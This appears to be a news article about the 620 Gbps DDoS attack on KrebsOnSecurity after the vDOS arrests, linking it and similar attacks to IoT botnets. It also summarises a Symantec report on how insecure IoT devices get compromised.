Security journalist Brian Krebs has been the prime target of a major attack and the new weapon for DDoS attacks – IoT devices.
Krebs posted earlier this month about vDOS, an Israeli online DDoS service reportedly responsible for “277 million seconds of attack time, or approximately 8.81 years worth of attack traffic.” Last Tuesday, he detailed a story about how the two individuals behind vDOS were arrested. Since Krebs identified one of the vDOS founders, it was hours later that he found his site immediately shut down from a wave of DDoS attacks, including SYN and HTTP floods, at an unprecedented size of 620 Gbps.
The Akamai network redirect his website to 127.0.0.1 to sinkhole all the malicious traffic and keep KrebsOnSecurity back online. Yet as the DDoS attacks persisted, the expense of fighting them became overwhelming and as of Thursday, Akamai suspended their services.
Along with recent attacks on Choopa/Vultr, OVH (now leading as the worst attack at 1.1Tpbs), Blizzard Games, and Riot Games that happened immediately after KrebsOnSecurity, Krebs believes that they are all likely to be traced from Internet of Things (IoT) devices in the form of routers, IP cameras and DVRs that were easily manipulated with botnet software due to poor password protections.
“Preliminary analysis of the attack traffic suggests that perhaps the biggest chunk of the attack came in the form of traffic designed to look like it was generic routing encapsulation (GRE) data packets, a communication protocol used to establish a direct, point-to-point connection between network nodes,” Krebs said.
During the same week on Thursday, Symantec published a report warning that insecure IoT devices are increasingly compromised and manipulated to launch DDoS attacks. Symantec has observed the number of cross-platform DDoS malware families that can infect Linux-based systems rose in 2015 at a total of 11 and will continue this year. These threats are designed to run on Linux-based firmware for CPU architectures commonly used in embedded and IoT devices. New Weapon for DDoS attacks are IoT Devices
Symantec’s data demonstrates that most of these systems are not compromised due to poor encryption and firmware not having the latest security updates. Attackers typically scan the internet for devices with open Telnet or SSH ports and try to log-in with brute-force attempt with commonly used credentials. Another common tactic is using a wget or tftp command to download a shell script (.sh) that in turn downloads the bot binaries. Once executed, the attacker can control the device via an established connection to the Command & Control (C&C) server.
The recent attacks sets a precedent that attackers can have the capability to compromise a giant network of devices for future (and larger) DDoS attacks.